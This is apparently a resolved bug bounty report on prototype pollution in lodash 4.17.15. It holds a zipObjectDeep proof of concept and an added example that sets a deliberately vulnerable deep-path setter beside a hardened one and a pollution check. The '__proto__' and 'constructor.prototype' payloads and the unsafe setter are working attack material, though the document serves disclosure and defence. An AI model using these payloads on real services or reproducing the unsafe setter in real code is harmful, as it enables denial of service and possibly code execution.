Prototype pollution attack (lodash)
Severity: High
Vulnerability Details
I would like to report a prototype pollution vulnerability in lodash.
It allows an attacker to inject properties on Object.prototype.
Module
module name: lodash
version: 4.17.15
npm page: https://www.npmjs.com/package/lodash
Module Description
The Lodash library exported as Node.js modules.
Module Stats
25,228,177 downloads in the last week
Vulnerability
Vulnerability Description
This is similar to this vulnerability: https://hackerone.com/reports/380873
The functions merge, mergeWith, and defaultsDeep can be tricked into adding or modifying properties of the Object prototype. These properties will be present on all objects.
Steps To Reproduce:
Craft an object with lodash's "zipObjectDeep" function:

```javascript
const _ = require('lodash');
// The path segment '__proto__' walks into Object.prototype, so 'z' is set there
_.zipObjectDeep(['__proto__.z'], [123]);
// The bare identifier resolves through the global object's prototype chain
console.log(z); // 123
```
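The mechanism behind the step above, as an added example that is neither lodash's code nor the reporter's: a minimal deep-path setter (the illustrative setPathUnsafe and zipObjectDeepUnsafe) modelled on what zipObjectDeep does with a dotted path, beside a hardened variant that refuses the __proto__, constructor and prototype segments and only descends into own properties, plus an isPrototypePolluted check usable in a running process. It handles dotted paths only (lodash's bracket syntax is left out as a simplifying assumption) and goes one step beyond the report by showing that, in this model, constructor.prototype.z reaches Object.prototype just as __proto__.z does; all function names are illustrative.

```javascript
'use strict';

// Added example, not lodash's code: a minimal deep-path setter modelled on what
// zipObjectDeep(paths, values) does, in a vulnerable form and a hardened form.
// Path syntax is restricted to dotted keys ('a.b.c'); lodash's bracket syntax
// ('a[0]') is deliberately left out (assumption for brevity).

const isObject = (v) => v !== null && (typeof v === 'object' || typeof v === 'function');

// Vulnerable: creates or descends into every segment, so '__proto__' lands on
// Object.prototype, and 'constructor.prototype' gets there via the Object function.
function setPathUnsafe(target, path, value) {
  const keys = path.split('.');
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    if (!isObject(node[keys[i]])) node[keys[i]] = {};
    node = node[keys[i]];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

function zipObjectDeepUnsafe(paths, values) {
  return paths.reduce((acc, p, i) => setPathUnsafe(acc, p, values[i]), {});
}

// Hardened: refuse the keys that reach a prototype, and never descend into an
// inherited property (only own, object-valued properties are traversed).
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function setPathSafe(target, path, value) {
  const keys = path.split('.');
  for (const k of keys) {
    if (FORBIDDEN_KEYS.has(k)) throw new TypeError(`refusing to traverse key "${k}"`);
  }
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const k = keys[i];
    if (!Object.prototype.hasOwnProperty.call(node, k) || !isObject(node[k])) {
      node[k] = {};
    }
    node = node[k];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

function zipObjectDeepSafe(paths, values) {
  return paths.reduce((acc, p, i) => setPathSafe(acc, p, values[i]), {});
}

// Runtime check: a key that was never defined on Object.prototype must not be
// an own property of it.
function isPrototypePolluted(key) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, key);
}

// Run one payload through the vulnerable setter, observe the effect on an
// unrelated object, then undo the pollution so the process stays usable.
function demoPollution(path) {
  const key = path.split('.').pop();
  const before = isPrototypePolluted(key);
  zipObjectDeepUnsafe([path], [123]);
  const observed = ({})[key];        // a fresh object that never saw the payload
  const during = isPrototypePolluted(key);
  delete Object.prototype[key];      // cleanup; a real service would need a restart
  const after = isPrototypePolluted(key);
  return { before, observed, during, after };
}

// The same payload against the hardened setter is rejected outright.
function demoHardened(path) {
  try {
    zipObjectDeepSafe([path], [123]);
    return 'set';
  } catch (e) {
    return e instanceof TypeError ? 'rejected' : 'error';
  }
}

console.log(demoPollution('__proto__.z'));             // { before: false, observed: 123, during: true, after: false }
console.log(demoPollution('constructor.prototype.z')); // same shape: the second path reaches Object.prototype too
console.log(demoHardened('__proto__.z'));              // rejected
console.log(zipObjectDeepSafe(['a.b.c', 'a.d'], [1, 2])); // { a: { b: { c: 1 }, d: 2 } }
```

Run it with node. The delete in demoPollution only works because the demo knows which key it added; in a real process the polluted key is attacker-chosen, so the practical response to a detected pollution is to restart the process rather than try to clean Object.prototype.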
## Impact
Variable. A server crash or the server becoming unable to respond to all requests is guaranteed, but a more significant impact, such as remote code execution, can be achieved in some cases.
Report Stats
- Report ID: 712065
- State: Closed
- Substate: resolved
- Upvotes: 16